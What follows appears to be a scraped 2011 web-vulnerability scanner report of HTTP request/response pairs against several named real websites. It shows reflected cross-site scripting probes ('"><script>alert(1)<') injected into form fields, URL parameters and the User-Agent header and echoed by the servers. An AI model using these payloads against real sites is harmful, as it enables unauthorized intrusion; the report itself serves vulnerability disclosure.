GET /buyerDetails.php?buyerId Host: www.integritydefender.com Proxy-Connection: keep-alive Referer: http://www.integrity Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:47:18 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 13356 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="item_number" value="689b2c5\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /buyerDetails.php |
POST /buyerDetails.php HTTP/1.1 Host: www.integritydefender.com Proxy-Connection: keep-alive Referer: http://www.integrity Cache-Control: max-age=0 Origin: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 Content-Length: 62 amount=489&item_name |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:47:03 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="service" value="Basic Personal Services52a0a\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /buyerDetails.php |
POST /buyerDetails.php HTTP/1.1 Host: www.integritydefender.com Proxy-Connection: keep-alive Referer: http://www.integrity Cache-Control: max-age=0 Origin: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 Content-Length: 62 amount=489&item_name |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:47:03 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14324 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <strong class="blacktitle">Basic Personal Services7345d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
GET /servlet/servlet Host: www.salesforce.com Connection: keep-alive Referer: http://www.reputatio Cache-Control: max-age=0 Origin: http://www.reputatio User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Mon, 25 Apr 2011 16:06:42 GMT Content-Length: 546 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.reput ...[SNIP]... <script> if (window.location.replace) window.location.replace( } else {; window.location.href ='http://www.reputat } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
GET /servlet/servlet Host: www.salesforce.com Connection: keep-alive Referer: http://www.reputatio Cache-Control: max-age=0 Origin: http://www.reputatio User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Mon, 25 Apr 2011 16:06:42 GMT Content-Length: 603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.reput ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=&lastName= |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:59 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17182 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <textarea name="comments">b9f53<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=&lastName= |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:45 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17185 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <input name="company" type="text" value="2efe4\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=&lastName= |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:48 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17196 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <input name="email" type="text" value="1f5b7\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=54249"><script>alert(1)< |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:38 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17190 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <input name="firstName" type="text" value="54249\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=&lastName=eb23d"><script>alert(1)< |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:42 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17178 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <input name="lastName" type="text" value="eb23d\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stillsecure |
Path: | /m/ |
POST /m/?c=contact-us HTTP/1.1 Host: www.stillsecure.com Proxy-Connection: keep-alive Referer: http://www.stillsecure Cache-Control: max-age=0 Origin: http://www.stillsecure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=80d1802a2b Content-Length: 168 firstName=&lastName= |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 11:58:52 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1 X-Powered-By: PHP/5.2.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 17138 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title></title> <style type="text/css" media="sc ...[SNIP]... <input name="phone" type="text" value="ffb4b\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trust-guard |
Path: | /Other/ImageResizer.php |
GET /Other/ImageResizer.php Host: www.trust-guard.com Proxy-Connection: keep-alive Referer: http://www.trust-guard User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 400 Bad Request Date: Mon, 25 Apr 2011 19:33:58 GMT Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93 file not found /Images/Testimonials |
Severity: | Low |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/Netspark |
GET /hmc/report/Netspark User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)< Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Mon, 25 Apr 2011 13:41:34 GMT Server: Apache/2.0.46 (Red Hat) Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 <!-- " ---></TD></TD></TD></TH>< ...[SNIP]... <font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dmca.com |
Path: | /Protection/Status.aspx |
GET /Protection/Status.aspx Host: www.dmca.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: whoson=320680-61842 X-Powered-By: ASP.NET Date: Mon, 25 Apr 2011 16:10:41 GMT Content-Length: 14278 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html xmlns="http://www.w3.org <head id="ctl00_mstrHead"> Reputation Changer | Protected by DMCA Protecti ...[SNIP]... <br />Referer is: http://www.google.com <br /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /business/server-security |
GET /business/server-security Host: www.eset.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 17267 Date: Mon, 25 Apr 2011 12:59:24 GMT X-Varnish: 1310979423 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>M ...[SNIP]... the next lines. */ s.pageName=""; s.server=""; s.channel="Business"; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us |
GET /us HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a Referer: http://www.google.com |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 26712 Date: Mon, 25 Apr 2011 15:18:23 GMT X-Varnish: 555657802 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... next lines. */ s.pageName="new_homepage" s.server=""; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/ |
GET /us/ HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a Referer: http://www.google.com |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 26742 Date: Mon, 25 Apr 2011 15:20:14 GMT X-Varnish: 555663552 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... next lines. */ s.pageName="new_homepage" s.server=""; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/business/products |
GET /us/business/products?CMP Host: www.eset.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a Referer: http://www.google.com |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 21125 Date: Mon, 25 Apr 2011 12:53:27 GMT X-Varnish: 1310966651 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... the next lines. */ s.pageName=""; s.server=""; s.channel="Business"; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/business/server |
GET /us/business/server Host: www.eset.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 17267 Date: Mon, 25 Apr 2011 12:59:23 GMT X-Varnish: 1310979390 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>M ...[SNIP]... the next lines. */ s.pageName=""; s.server=""; s.channel="Business"; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/home/smart-security |
GET /us/home/smart-security HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tnt=3; PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 25525 Date: Mon, 25 Apr 2011 15:18:50 GMT X-Varnish: 555659225 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... on the next lines. */ s.pageName=""; s.server=""; s.channel="Home"; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/store |
GET /us/store HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 38902 Date: Mon, 25 Apr 2011 12:59:41 GMT X-Varnish: 1310980199 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>P ...[SNIP]... n the next lines. */ s.pageName=""; s.server=""; s.channel="Store"; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eset.com |
Path: | /us/styles/store-new.css |
GET /us/styles/store-new.css HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 26712 Date: Mon, 25 Apr 2011 13:02:15 GMT X-Varnish: 1310986158 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... next lines. */ s.pageName="new_homepage" s.server=""; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop12="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events=""; s.products=""; s.purchaseID=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar4=""; s.eVar5=""; /************* D ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.marketgid.com |
Path: | /pnews/773204/i/7269/pp/2 |
